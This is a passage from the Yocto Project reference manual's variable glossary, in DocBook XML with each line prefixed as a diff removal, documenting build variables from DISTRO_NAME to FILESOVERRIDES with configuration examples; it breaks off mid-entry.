- <filename>DISTRO_NAME</filename> variable is set as
- follows:
- <literallayout class='monospaced'>
- DISTRO_NAME = "Poky (Yocto Project Reference Distro)"
- </literallayout>
- </para>
-
- <para>
- Distribution configuration files are located in a
- <filename>conf/distro</filename> directory within the
- <link linkend='metadata'>Metadata</link>
- that contains the distribution configuration.
- <note>
- If the <filename>DISTRO_NAME</filename> variable is
- blank, a set of default configurations are used, which
- are specified within
- <filename>meta/conf/distro/defaultsetup.conf</filename>
- also in the Source Directory.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DISTRO_VERSION'><glossterm>DISTRO_VERSION</glossterm>
- <info>
- DISTRO_VERSION[doc] = "The version of the distribution."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The version of the distribution.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DISTROOVERRIDES'><glossterm>DISTROOVERRIDES</glossterm>
- <info>
- DISTROOVERRIDES[doc] = "A colon-separated list of overrides specific to the current distribution."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A colon-separated list of overrides specific to the
- current distribution.
- By default, this list includes the value of
- <link linkend='var-DISTRO'><filename>DISTRO</filename></link>.
- </para>
-
- <para>
- You can extend <filename>DISTROOVERRIDES</filename>
- to add extra overrides that should apply to
- the distribution.
- </para>
-
- <para>
- The underlying mechanism behind
- <filename>DISTROOVERRIDES</filename> is simply that it
- is included in the default value of
- <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DL_DIR'><glossterm>DL_DIR</glossterm>
- <info>
- DL_DIR[doc] = "The central download directory used by the build process to store downloads. By default, the directory is 'downloads' in the Build Directory."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The central download directory used by the build process to
- store downloads.
- By default, <filename>DL_DIR</filename> gets files
- suitable for mirroring for everything except Git
- repositories.
- If you want tarballs of Git repositories, use the
- <link linkend='var-BB_GENERATE_MIRROR_TARBALLS'><filename>BB_GENERATE_MIRROR_TARBALLS</filename></link>
- variable.
- </para>
-
- <para>
- You can set this directory by defining the
- <filename>DL_DIR</filename> variable in the
- <filename>conf/local.conf</filename> file.
- This directory is self-maintaining and you should not have
- to touch it.
- By default, the directory is <filename>downloads</filename>
- in the
- <link linkend='build-directory'>Build Directory</link>.
- <literallayout class='monospaced'>
- #DL_DIR ?= "${TOPDIR}/downloads"
- </literallayout>
- To specify a different download directory, simply remove
- the comment from the line and provide your directory.
- </para>
-
- <para>
- During a first build, the system downloads many different
- source code tarballs from various upstream projects.
- Downloading can take a while, particularly if your network
- connection is slow.
- Tarballs are all stored in the directory defined by
- <filename>DL_DIR</filename> and the build system looks there
- first to find source tarballs.
- <note>
- When wiping and rebuilding, you can preserve this
- directory to speed up this part of subsequent
- builds.
- </note>
- </para>
-
- <para>
- You can safely share this directory between multiple builds
- on the same development machine.
- For additional information on how the build process gets
- source files when working behind a firewall or proxy server,
- see this specific question in the
- "<link linkend='how-does-the-yocto-project-obtain-source-code-and-will-it-work-behind-my-firewall-or-proxy-server'>FAQ</link>"
- chapter.
- You can also refer to the
- "<ulink url='&YOCTO_WIKI_URL;/wiki/Working_Behind_a_Network_Proxy'>Working Behind a Network Proxy</ulink>"
- Wiki page.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DOC_COMPRESS'><glossterm>DOC_COMPRESS</glossterm>
- <info>
- DOC_COMPRESS[doc] = "When inheriting the compress_doc class, this variable sets the compression policy used when the OpenEmbedded build system compresses man pages and info pages."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-compress_doc'><filename>compress_doc</filename></link>
- class, this variable sets the compression policy used when
- the OpenEmbedded build system compresses man pages and info
- pages.
- By default, the compression method used is gz (gzip).
- Other policies available are xz and bz2.
- </para>
-
- <para>
- For information on policies and on how to use this
- variable, see the comments in the
- <filename>meta/classes/compress_doc.bbclass</filename> file.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-glossary-e'><title>E</title>
-
- <glossentry id='var-EFI_PROVIDER'><glossterm>EFI_PROVIDER</glossterm>
- <info>
- EFI_PROVIDER[doc] = "When building bootable images (i.e. where hddimg, iso, or wic.vmdk is in IMAGE_FSTYPES), the EFI_PROVIDER variable specifies the EFI bootloader to use."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When building bootable images (i.e. where
- <filename>hddimg</filename>, <filename>iso</filename>,
- or <filename>wic.vmdk</filename> is in
- <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>),
- the <filename>EFI_PROVIDER</filename> variable specifies
- the EFI bootloader to use.
- The default is "grub-efi", but "systemd-boot" can be used
- instead.
- </para>
-
- <para>
- See the
- <link linkend='ref-classes-systemd-boot'><filename>systemd-boot</filename></link>
- and
- <link linkend='ref-classes-image-live'><filename>image-live</filename></link>
- classes for more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ENABLE_BINARY_LOCALE_GENERATION'><glossterm>ENABLE_BINARY_LOCALE_GENERATION</glossterm>
- <info>
- ENABLE_BINARY_LOCALE_GENERATION[doc] = "Controls which locales for glibc are generated during the build. The variable is useful if the target device has 64Mbytes of RAM or less."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Variable that controls which locales for
- <filename>glibc</filename> are generated during the
- build (useful if the target device has 64Mbytes
- of RAM or less).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ERR_REPORT_DIR'><glossterm>ERR_REPORT_DIR</glossterm>
- <info>
- ERR_REPORT_DIR[doc] = "When used with the report-error class, specifies the path used for storing the debug files created by the error reporting tool, which allows you to submit build errors you encounter to a central database."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When used with the
- <link linkend='ref-classes-report-error'><filename>report-error</filename></link>
- class, specifies the path used for storing the debug files
- created by the
- <ulink url='&YOCTO_DOCS_DEV_URL;#using-the-error-reporting-tool'>error reporting tool</ulink>,
- which allows you to submit build errors you encounter to a
- central database.
- By default, the value of this variable is
- <filename>${</filename><link linkend='var-LOG_DIR'><filename>LOG_DIR</filename></link><filename>}/error-report</filename>.
- </para>
-
- <para>
- You can set <filename>ERR_REPORT_DIR</filename> to the path
- you want the error reporting tool to store the debug files
- as follows in your <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- ERR_REPORT_DIR = "<replaceable>path</replaceable>"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ERROR_QA'><glossterm>ERROR_QA</glossterm>
- <info>
- ERROR_QA[doc] = "Specifies the quality assurance checks whose failures are reported as errors by the OpenEmbedded build system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the quality assurance checks whose failures are
- reported as errors by the OpenEmbedded build system.
- You set this variable in your distribution configuration
- file.
- For a list of the checks you can control with this variable,
- see the
- "<link linkend='ref-classes-insane'><filename>insane.bbclass</filename></link>"
- section.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-EXCLUDE_FROM_SHLIBS'><glossterm>EXCLUDE_FROM_SHLIBS</glossterm>
- <info>
- EXCLUDE_FROM_SHLIBS[doc] = "Causes the OpenEmbedded build system's shared libraries resolver to exclude an entire package when scanning for shared libraries."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Triggers the OpenEmbedded build system's shared libraries
- resolver to exclude an entire package when scanning for
- shared libraries.
- <note>
- The shared libraries resolver's functionality results
- in part from the internal function
- <filename>package_do_shlibs</filename>, which is part of
- the
- <link linkend='ref-tasks-package'><filename>do_package</filename></link>
- task.
- You should be aware that the shared libraries resolver
- might implicitly define some dependencies between
- packages.
- </note>
- The <filename>EXCLUDE_FROM_SHLIBS</filename> variable is
- similar to the
- <link linkend='var-PRIVATE_LIBS'><filename>PRIVATE_LIBS</filename></link>
- variable, which excludes a package's particular libraries
- only and not the whole package.
- </para>
-
- <para>
- Use the
- <filename>EXCLUDE_FROM_SHLIBS</filename> variable by
- setting it to "1" for a particular package:
- <literallayout class='monospaced'>
- EXCLUDE_FROM_SHLIBS = "1"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-EXCLUDE_FROM_WORLD'><glossterm>EXCLUDE_FROM_WORLD</glossterm>
- <info>
- EXCLUDE_FROM_WORLD[doc] = "Directs BitBake to exclude a recipe from world builds (i.e. bitbake world)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Directs BitBake to exclude a recipe from world builds (i.e.
- <filename>bitbake world</filename>).
- During world builds, BitBake locates, parses and builds all
- recipes found in every layer exposed in the
- <filename>bblayers.conf</filename> configuration file.
- </para>
-
- <para>
- To exclude a recipe from a world build using this variable,
- set the variable to "1" in the recipe.
- </para>
-
- <note>
- Recipes added to <filename>EXCLUDE_FROM_WORLD</filename>
- may still be built during a world build in order to satisfy
- dependencies of other recipes.
- Adding a recipe to <filename>EXCLUDE_FROM_WORLD</filename>
- only ensures that the recipe is not explicitly added
- to the list of build targets in a world build.
- </note>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-EXTENDPE'><glossterm>EXTENDPE</glossterm>
- <info>
- EXTENDPE[doc] = "Used with file and pathnames to create a prefix for a recipe's version based on the recipe's PE value. If PE is set and greater than zero for a recipe, EXTENDPE becomes that value."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Used with file and pathnames to create a prefix for a recipe's
- version based on the recipe's
- <link linkend='var-PE'><filename>PE</filename></link> value.
- If <filename>PE</filename> is set and greater than zero for a recipe,
- <filename>EXTENDPE</filename> becomes that value (e.g if
- <filename>PE</filename> is equal to "1" then <filename>EXTENDPE</filename>
- becomes "1_").
- If a recipe's <filename>PE</filename> is not set (the default) or is equal to
- zero, <filename>EXTENDPE</filename> becomes "".</para>
- <para>See the <link linkend='var-STAMP'><filename>STAMP</filename></link>
- variable for an example.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-EXTENDPKGV'><glossterm>EXTENDPKGV</glossterm>
- <info>
- EXTENDPKGV[doc] = "The full package version specification as it appears on the final packages produced by a recipe."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The full package version specification as it appears on the
- final packages produced by a recipe.
- The variable's value is normally used to fix a runtime
- dependency to the exact same version of another package
- in the same recipe:
- <literallayout class='monospaced'>
- RDEPENDS_${PN}-additional-module = "${PN} (= ${EXTENDPKGV})"
- </literallayout>
- </para>
-
- <para>
- The dependency relationships are intended to force the
- package manager to upgrade these types of packages in
- lock-step.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-EXTERNAL_KERNEL_TOOLS'><glossterm>EXTERNAL_KERNEL_TOOLS</glossterm>
- <info>
- EXTERNAL_KERNEL_TOOLS[doc] = "Indicates kernel tools are external to the source tree."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When set, the <filename>EXTERNAL_KERNEL_TOOLS</filename>
- variable indicates that these tools are not in the
- source tree.
- </para>
-
- <para>
- When kernel tools are available in the tree, they are
- preferred over any externally installed tools.
- Setting the <filename>EXTERNAL_KERNEL_TOOLS</filename>
- variable tells the OpenEmbedded build system to prefer
- the installed external tools.
- See the
- <link linkend='ref-classes-kernel-yocto'><filename>kernel-yocto</filename></link>
- class in <filename>meta/classes</filename> to see how
- the variable is used.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-EXTERNALSRC'><glossterm>EXTERNALSRC</glossterm>
- <info>
- EXTERNALSRC[doc] = "If externalsrc.bbclass is inherited, this variable points to the source tree, which is outside of the OpenEmbedded build system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-externalsrc'><filename>externalsrc</filename></link>
- class, this variable points to the source tree, which is
- outside of the OpenEmbedded build system.
- When set, this variable sets the
- <link linkend='var-S'><filename>S</filename></link>
- variable, which is what the OpenEmbedded build system uses
- to locate unpacked recipe source code.
- </para>
-
- <para>
- For more information on
- <filename>externalsrc.bbclass</filename>, see the
- "<link linkend='ref-classes-externalsrc'><filename>externalsrc.bbclass</filename></link>"
- section.
- You can also find information on how to use this variable
- in the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#building-software-from-an-external-source'>Building Software from an External Source</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-EXTERNALSRC_BUILD'><glossterm>EXTERNALSRC_BUILD</glossterm>
- <info>
- EXTERNALSRC_BUILD[doc] = "If externalsrc.bbclass is inherited, this variable points to the directory in which the recipe's source code is built, which is outside of the OpenEmbedded build system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-externalsrc'><filename>externalsrc</filename></link>
- class, this variable points to the directory in which the
- recipe's source code is built, which is outside of the
- OpenEmbedded build system.
- When set, this variable sets the
- <link linkend='var-B'><filename>B</filename></link>
- variable, which is what the OpenEmbedded build system uses
- to locate the Build Directory.
- </para>
-
- <para>
- For more information on
- <filename>externalsrc.bbclass</filename>, see the
- "<link linkend='ref-classes-externalsrc'><filename>externalsrc.bbclass</filename></link>"
- section.
- You can also find information on how to use this variable
- in the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#building-software-from-an-external-source'>Building Software from an External Source</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-EXTRA_AUTORECONF'><glossterm>EXTRA_AUTORECONF</glossterm>
- <info>
- EXTRA_AUTORECONF[doc] = "Extra options passed to the autoreconf command, which is executed during do_configure."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- For recipes inheriting the
- <link linkend='ref-classes-autotools'><filename>autotools</filename></link>
- class, you can use <filename>EXTRA_AUTORECONF</filename> to
- specify extra options to pass to the
- <filename>autoreconf</filename> command that is
- executed during the
- <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
- task.
- </para>
-
- <para>
- The default value is "--exclude=autopoint".
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-EXTRA_IMAGE_FEATURES'><glossterm>EXTRA_IMAGE_FEATURES</glossterm>
- <info>
- EXTRA_IMAGE_FEATURES[doc] = "The list of additional features to include in an image. Configure this variable in the conf/local.conf file in the Build Directory."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of additional features to include in an image.
- When listing more than one feature, separate them with
- a space.
- </para>
-
- <para>
- Typically, you configure this variable in your
- <filename>local.conf</filename> file, which is found in the
- <link linkend='build-directory'>Build Directory</link>.
- Although you can use this variable from within a recipe,
- best practices dictate that you do not.
- <note>
- To enable primary features from within the image
- recipe, use the
- <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>
- variable.
- </note>
- </para>
-
- <para>
- Here are some examples of features you can add:
- <literallayout class='monospaced'>
-"dbg-pkgs" - Adds -dbg packages for all installed packages
- including symbol information for debugging and
- profiling.
-
-"debug-tweaks" - Makes an image suitable for debugging.
- For example, allows root logins without
- passwords and enables post-installation
- logging. See the 'allow-empty-password'
- and 'post-install-logging' features in
- the "<link linkend='ref-features-image'>Image Features</link>" section for
- more information.
-
-"dev-pkgs" - Adds -dev packages for all installed packages.
- This is useful if you want to develop against
- the libraries in the image.
-
-"read-only-rootfs" - Creates an image whose root
- filesystem is read-only. See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-read-only-root-filesystem'>Creating a Read-Only Root Filesystem</ulink>"
- section in the Yocto Project
- Development Tasks Manual for
- more information
-
-"tools-debug" - Adds debugging tools such as gdb and
- strace.
-
-"tools-sdk" - Adds development tools such as gcc, make,
- pkgconfig and so forth.
-
-"tools-testapps" - Adds useful testing tools such as
- ts_print, aplay, arecord and so
- forth.
-
- </literallayout>
- </para>
-
- <para>
- For a complete list of image features that ships with the
- Yocto Project, see the
- "<link linkend="ref-features-image">Image Features</link>"
- section.
- </para>
-
- <para>
- For an example that shows how to customize your image by
- using this variable, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#usingpoky-extend-customimage-imagefeatures'>Customizing Images Using Custom <filename>IMAGE_FEATURES</filename> and <filename>EXTRA_IMAGE_FEATURES</filename></ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-EXTRA_IMAGECMD'><glossterm>EXTRA_IMAGECMD</glossterm>
- <info>
- EXTRA_IMAGECMD[doc] = "Specifies additional options for the image creation command that has been specified in IMAGE_CMD. When setting this variable, you should use an override for the associated image type."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies additional options for the image
- creation command that has been specified in
- <link linkend='var-IMAGE_CMD'><filename>IMAGE_CMD</filename></link>.
- When setting this variable, use an override for the
- associated image type.
- Here is an example:
- <literallayout class='monospaced'>
- EXTRA_IMAGECMD_ext3 ?= "-i 4096"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-EXTRA_IMAGEDEPENDS'><glossterm>EXTRA_IMAGEDEPENDS</glossterm>
- <info>
- EXTRA_IMAGEDEPENDS[doc] = "A list of recipes to build that do not provide packages for installing into the root filesystem. Use this variable to list recipes that are required to build the final image, but not needed in the root filesystem."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of recipes to build that do not provide packages
- for installing into the root filesystem.
- </para>
-
- <para>
- Sometimes a recipe is required to build the final image but is not
- needed in the root filesystem.
- You can use the <filename>EXTRA_IMAGEDEPENDS</filename> variable to
- list these recipes and thus specify the dependencies.
- A typical example is a required bootloader in a machine configuration.
- </para>
-
- <note>
- To add packages to the root filesystem, see the various
- <filename>*<link linkend='var-RDEPENDS'>RDEPENDS</link></filename>
- and <filename>*<link linkend='var-RRECOMMENDS'>RRECOMMENDS</link></filename>
- variables.
- </note>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-EXTRANATIVEPATH'><glossterm>EXTRANATIVEPATH</glossterm>
- <info>
- EXTRANATIVEPATH[doc] = "A list of subdirectories of ${STAGING_BINDIR_NATIVE} added to the beginning of the environment variable PATH."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of subdirectories of
- <filename>${</filename><link linkend='var-STAGING_BINDIR_NATIVE'><filename>STAGING_BINDIR_NATIVE</filename></link><filename>}</filename>
- added to the beginning of the environment variable
- <filename>PATH</filename>.
- As an example, the following prepends
- "${STAGING_BINDIR_NATIVE}/foo:${STAGING_BINDIR_NATIVE}/bar:"
- to <filename>PATH</filename>:
- <literallayout class='monospaced'>
- EXTRANATIVEPATH = "foo bar"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-EXTRA_OECMAKE'><glossterm>EXTRA_OECMAKE</glossterm>
- <info>
- EXTRA_OECMAKE[doc] = "Additional cmake options."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Additional
- <ulink url='https://cmake.org/overview/'>CMake</ulink>
- options.
- See the
- <link linkend='ref-classes-cmake'><filename>cmake</filename></link>
- class for additional information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-EXTRA_OECONF'><glossterm>EXTRA_OECONF</glossterm>
- <info>
- EXTRA_OECONF[doc] = "Additional configure script options."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Additional <filename>configure</filename> script options.
- See
- <link linkend='var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></link>
- for additional information on passing configure script
- options.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-EXTRA_OEMAKE'><glossterm>EXTRA_OEMAKE</glossterm>
- <info>
- EXTRA_OEMAKE[doc] = "Additional GNU make options."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Additional GNU <filename>make</filename> options.
- </para>
-
- <para>
- Because the <filename>EXTRA_OEMAKE</filename> defaults to
- "", you need to set the variable to specify any required
- GNU options.
- </para>
-
- <para>
- <link linkend='var-PARALLEL_MAKE'><filename>PARALLEL_MAKE</filename></link>
- and
- <link linkend='var-PARALLEL_MAKEINST'><filename>PARALLEL_MAKEINST</filename></link>
- also make use of
- <filename>EXTRA_OEMAKE</filename> to pass the required
- flags.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-EXTRA_OESCONS'><glossterm>EXTRA_OESCONS</glossterm>
- <info>
- EXTRA_OESCONS[doc] = "When a recipe inherits the scons class, this variable specifies additional configuration options you want to pass to the scons command line."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-scons'><filename>scons</filename></link>
- class, this variable specifies additional configuration
- options you want to pass to the
- <filename>scons</filename> command line.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-EXTRA_USERS_PARAMS'><glossterm>EXTRA_USERS_PARAMS</glossterm>
- <info>
- EXTRA_USERS_PARAMS[doc] = "When a recipe inherits the extrausers class, this variable provides image level user and group operations."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-extrausers'><filename>extrausers</filename></link>
- class, this variable provides image level user and group
- operations.
- This is a more global method of providing user and group
- configuration as compared to using the
- <link linkend='ref-classes-useradd'><filename>useradd</filename></link>
- class, which ties user and group configurations to a
- specific recipe.
- </para>
-
- <para>
- The set list of commands you can configure using the
- <filename>EXTRA_USERS_PARAMS</filename> is shown in the
- <filename>extrausers</filename> class.
- These commands map to the normal Unix commands of the same
- names:
- <literallayout class='monospaced'>
- # EXTRA_USERS_PARAMS = "\
- # useradd -p '' tester; \
- # groupadd developers; \
- # userdel nobody; \
- # groupdel -g video; \
- # groupmod -g 1020 developers; \
- # usermod -s /bin/sh tester; \
- # "
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-glossary-f'><title>F</title>
-
- <glossentry id='var-FEATURE_PACKAGES'><glossterm>FEATURE_PACKAGES</glossterm>
- <info>
- FEATURE_PACKAGES[doc] = "Defines one or more packages to include in an image when a specific item is included in IMAGE_FEATURES. When setting the value, FEATURE_PACKAGES should have the name of the feature item as an override."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines one or more packages to include in an image when
- a specific item is included in
- <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>.
- When setting the value, <filename>FEATURE_PACKAGES</filename>
- should have the name of the feature item as an override.
- Here is an example:
- <literallayout class='monospaced'>
- FEATURE_PACKAGES_widget = "<replaceable>package1</replaceable> <replaceable>package2</replaceable>"
- </literallayout>
- </para>
-
- <para>
- In this example, if "widget" were added to
- <filename>IMAGE_FEATURES</filename>, <replaceable>package1</replaceable> and
- <replaceable>package2</replaceable> would be included in the image.
- <note>
- Packages installed by features defined through
- <filename>FEATURE_PACKAGES</filename> are often package
- groups.
- While similarly named, you should not confuse the
- <filename>FEATURE_PACKAGES</filename> variable with
- package groups, which are discussed elsewhere in the
- documentation.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-FEED_DEPLOYDIR_BASE_URI'><glossterm>FEED_DEPLOYDIR_BASE_URI</glossterm>
- <info>
- FEED_DEPLOYDIR_BASE_URI[doc] = "Allow to serve ipk deploy directory as an ad hoc feed (bogofeed). Set to base URL of the directory as exported by HTTP. Set of ad hoc feed configs will be generated in the image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to the base URL of the server and location within
- the document-root that provides the metadata and
- packages required by OPKG to support runtime package
- management of IPK packages.
- You set this variable in your
- <filename>local.conf</filename> file.
- </para>
-
- <para>
- Consider the following example:
- <literallayout class='monospaced'>
- FEED_DEPLOYDIR_BASE_URI = "http://192.168.7.1/BOARD-dir"
- </literallayout>
- This example assumes you are serving your packages over
- HTTP and your databases are located in a directory
- named <filename>BOARD-dir</filename>, which is underneath
- your HTTP server's document-root.
- In this case, the OpenEmbedded build system generates a set
- of configuration files for you in your target that work
- with the feed.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-FILES'><glossterm>FILES</glossterm>
- <info>
- FILES[doc] = "The list of directories or files that are placed in a package."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The list of files and directories that are placed in a
- package.
- The
- <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>
- variable lists the packages generated by a recipe.
- </para>
-
- <para>
- To use the <filename>FILES</filename> variable, provide a
- package name override that identifies the resulting package.
- Then, provide a space-separated list of files or paths
- that identify the files you want included as part of the
- resulting package.
- Here is an example:
- <literallayout class='monospaced'>
- FILES_${PN} += "${bindir}/mydir1 ${bindir}/mydir2/myfile"
- </literallayout>
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- When specifying files or paths, you can pattern
- match using Python's
- <ulink url='https://docs.python.org/2/library/glob.html'><filename>glob</filename></ulink>
- syntax.
- For details on the syntax, see the
- documentation by following the previous link.
- </para></listitem>
- <listitem><para>
- When specifying paths as part of the
- <filename>FILES</filename> variable, it is
- good practice to use appropriate path
- variables.
- For example, use <filename>${sysconfdir}</filename>
- rather than <filename>/etc</filename>, or
- <filename>${bindir}</filename> rather than
- <filename>/usr/bin</filename>.
- You can find a list of these variables at the
- top of the
- <filename>meta/conf/bitbake.conf</filename>
- file in the
- <link linkend='source-directory'>Source Directory</link>.
- You will also find the default values of the
- various <filename>FILES_*</filename> variables
- in this file.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- If some of the files you provide with the
- <filename>FILES</filename> variable are editable and you
- know they should not be overwritten during the package
- update process by the Package Management System (PMS), you
- can identify these files so that the PMS will not
- overwrite them.
- See the
- <link linkend='var-CONFFILES'><filename>CONFFILES</filename></link>
- variable for information on how to identify these files to
- the PMS.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-FILES_SOLIBSDEV'><glossterm>FILES_SOLIBSDEV</glossterm>
- <info>
- FILES_SOLIBSDEV[doc] = "Defines the full path name of the development symbolic link (symlink) for shared libraries on the target platform."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines the file specification to match
- <link linkend='var-SOLIBSDEV'><filename>SOLIBSDEV</filename></link>.
- In other words, <filename>FILES_SOLIBSDEV</filename>
- defines the full path name of the development symbolic link
- (symlink) for shared libraries on the target platform.
- </para>
-
- <para>
- The following statement from the
- <filename>bitbake.conf</filename> shows how it is set:
- <literallayout class='monospaced'>
- FILES_SOLIBSDEV ?= "${base_libdir}/lib*${SOLIBSDEV} ${libdir}/lib*${SOLIBSDEV}"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-FILESEXTRAPATHS'><glossterm>FILESEXTRAPATHS</glossterm>
- <info>
- FILESEXTRAPATHS[doc] = "Extends the search path the OpenEmbedded build system uses when looking for files and patches as it processes recipes and append files."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Extends the search path the OpenEmbedded build system uses
- when looking for files and patches as it processes recipes
- and append files.
- The default directories BitBake uses when it processes
- recipes are initially defined by the
- <link linkend='var-FILESPATH'><filename>FILESPATH</filename></link>
- variable.
- You can extend <filename>FILESPATH</filename> variable
- by using <filename>FILESEXTRAPATHS</filename>.
- </para>
-
- <para>
- Best practices dictate that you accomplish this by using
- <filename>FILESEXTRAPATHS</filename> from within a
- <filename>.bbappend</filename> file and that you prepend
- paths as follows:
- <literallayout class='monospaced'>
- FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
- </literallayout>
- In the above example, the build system first looks for files
- in a directory that has the same name as the corresponding
- append file.
- <note>
- <para>When extending
- <filename>FILESEXTRAPATHS</filename>,
- be sure to use the immediate expansion
- (<filename>:=</filename>) operator.
- Immediate expansion makes sure that BitBake evaluates
- <link linkend='var-THISDIR'><filename>THISDIR</filename></link>
- at the time the directive is encountered rather than at
- some later time when expansion might result in a
- directory that does not contain the files you need.
- </para>
-
- <para>Also, include the trailing separating colon
- character if you are prepending.
- The trailing colon character is necessary because you
- are directing BitBake to extend the path by prepending
- directories to the search path.</para>
- </note>
- Here is another common use:
- <literallayout class='monospaced'>
- FILESEXTRAPATHS_prepend := "${THISDIR}/files:"
- </literallayout>
- In this example, the build system extends the
- <filename>FILESPATH</filename> variable to include a
- directory named <filename>files</filename> that is in the
- same directory as the corresponding append file.
- </para>
-
- <para>
- This next example specifically adds three paths:
- <literallayout class='monospaced'>
- FILESEXTRAPATHS_prepend := "path_1:path_2:path_3:"
- </literallayout>
- </para>
-
- <para>
- A final example shows how you can extend the search path
- and include a
- <link linkend='var-MACHINE'><filename>MACHINE</filename></link>-specific
- override, which is useful in a BSP layer:
- <literallayout class='monospaced'>
- FILESEXTRAPATHS_prepend_intel-x86-common := "${THISDIR}/${PN}:"
- </literallayout>
- The previous statement appears in the
- <filename>linux-yocto-dev.bbappend</filename> file, which
- is found in the Yocto Project
- <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>
- in
- <filename>meta-intel/common/recipes-kernel/linux</filename>.
- Here, the machine override is a special
- <link linkend='var-PACKAGE_ARCH'><filename>PACKAGE_ARCH</filename></link>
- definition for multiple <filename>meta-intel</filename>
- machines.
- <note>
- For a layer that supports a single BSP, the override
- could just be the value of <filename>MACHINE</filename>.
- </note>
- </para>
-
- <para>
- By prepending paths in <filename>.bbappend</filename>
- files, you allow multiple append files that reside in
- different layers but are used for the same recipe to
- correctly extend the path.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-FILESOVERRIDES'><glossterm>FILESOVERRIDES</glossterm>
- <info>
- FILESOVERRIDES[doc] = "A subset of OVERRIDES used by the OpenEmbedded build system for creating FILESPATH."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A subset of <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>
- used by the OpenEmbedded build system for creating
- <link linkend='var-FILESPATH'><filename>FILESPATH</filename></link>.
- The <filename>FILESOVERRIDES</filename> variable uses
- overrides to automatically extend the
